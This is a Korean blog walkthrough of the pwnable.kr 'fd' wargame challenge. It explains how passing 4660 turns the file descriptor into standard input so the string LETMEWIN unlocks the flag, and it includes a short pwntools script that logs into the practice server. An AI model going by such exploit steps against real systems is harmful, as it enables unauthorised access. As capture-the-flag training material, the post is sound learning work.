[Toddle]fd

🌇│System_Study/🪙│Pwnable.kr

[Toddle]fd

Jastes 2022. 11. 19. 21:15

fd_WriteUp

보시면.. 엄마! 리눅스 파일 디스크립터(fd)에 대하여 알아보고 싶어요~ 라고 하네요~~(패드립..)~~
ssh로 연결해서 하는건데 파일 받아서 하는게 좋겠죠? 그래서 받는 방식이 SCP로써..

리눅스 scp 사용법 - 제타위키

다음 문자열 포함...

zetawiki.com

위 명령어나 이미지를 보시고 하시면 됩니다..
(참고로 파일 전체를 받는게.. 잘 안되서 따로 따로 했는데 ㅠ)

해당 C file을 살펴보면.. 6번째를 보시면 인자에서 2개 이상으로 안 넣으면 에러를 토하고..
그러므로 argv에 하나만 넣습니다(어짜피 argv[1]은 path이기 때문이죠)

len에서 read의 함수를 입력할 거기에 read의 fd는 0이여야 입력을 받습니다.
여기서 fd(atoi로 ascii to integer)로 하기에 str로 보내고.. 이후는 buf에 들어가니까 뭐

그러므로 첫번째 인자에 0x1234(4660)으로 해야지 0으로 fd를 입력받습니다.
그리고 입력을 하는데 buf에.. 13번째 줄에서 LETMEWIN과 비교하므로 맞춰서 넣어줍니다.
(이정도로 간단한 구조이므로 익스 코드를 안 작성해도 되긴한데..)

Exploit code

1
2
3
4
5
6
7
8
9
10
11 from pwn import *
 
'''Connection pwnable.kr server'''
server = ssh('fd', 'pwnable.kr', 2222, 'guest')
p = server.process(['./fd', str(4660)]) #argv(for list) input
#context.log_level = 'debug'
 
p.sendline('LETMEWIN')
 
p.interactive()
 
Colored by Color Scripter cs

의 구조로써 저희는 user, host, port, password만 사용되므로 해당 방식으로 입력
process 부분은 저희가 인자를 하나 넣어야하므로...

위와 같이 배열로 넣어서 하네요

이건.. 설명안해도 되겠죠?

참고 자료

pwnlib.tubes.ssh — SSH — pwntools 4.8.0 documentation

A new SSH channel, or a path to a script if run=False.

docs.pwntools.com

pwnlib.tubes.process — Processes — pwntools 4.8.0 documentation

Parameters: argv (list) – List of arguments to pass to the spawned process. shell (bool) – Set to True to interpret argv as a string to pass to the shell for interpretation instead of as argv. executable (str) – Path to the binary to execute. If None

docs.pwntools.com

Built-in Types — Python 3.8.14 documentation

Built-in Types The following sections describe the standard types that are built into the interpreter. The principal built-in types are numerics, sequences, mappings, classes, instances and exceptions. Some collection classes are mutable. The methods that

docs.python.org

참고 이미지

저작자표시 비영리 변경금지